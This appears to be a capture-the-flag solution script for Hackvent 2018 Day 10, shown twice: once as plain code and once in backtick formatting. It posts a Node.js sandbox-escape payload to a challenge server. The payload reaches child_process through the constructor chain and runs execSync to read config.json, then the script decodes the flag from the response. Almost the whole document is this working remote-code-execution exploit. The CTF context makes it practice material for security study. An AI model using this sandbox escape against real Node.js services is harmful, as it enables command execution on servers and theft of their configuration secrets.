Hackvent_2018/Day 10/decode.py

#!/usr/bin/python

import urllib.request
import urllib.parse
import json

class Payload(object):
    def __init__(self, j):
        self.__dict__ = json.loads(j)
    def get(self, key):
        return self.__dict__[key]

code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
url = "http://whale.hacking-lab.com:3000/run"
data = urllib.parse.urlencode({"run": code}).encode()
request = urllib.request.Request(url, data=data)
response = urllib.request.urlopen(request).read()

p = Payload(response)
result = p.get("result")

indexStart = result.find("[") + 1
indexEnd = result.find("]")
result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])

p = Payload(result)
print(p.get("flag"))
Day 10 + 11 2018-12-11 14:15:19 +01:00			`#!/usr/bin/python`

			`import urllib.request`
			`import urllib.parse`
			`import json`

			`class Payload(object):`
			`def __init__(self, j):`
			`self.__dict__ = json.loads(j)`
			`def get(self, key):`
			`return self.__dict__[key]`

			`code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'`
			`url = "http://whale.hacking-lab.com:3000/run"`
			`data = urllib.parse.urlencode({"run": code}).encode()`
			`request = urllib.request.Request(url, data=data)`
			`response = urllib.request.urlopen(request).read()`

			`p = Payload(response)`
			`result = p.get("result")`

			`indexStart = result.find("[") + 1`
			`indexEnd = result.find("]")`
			`result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])`

			`p = Payload(result)`
			`print(p.get("flag"))`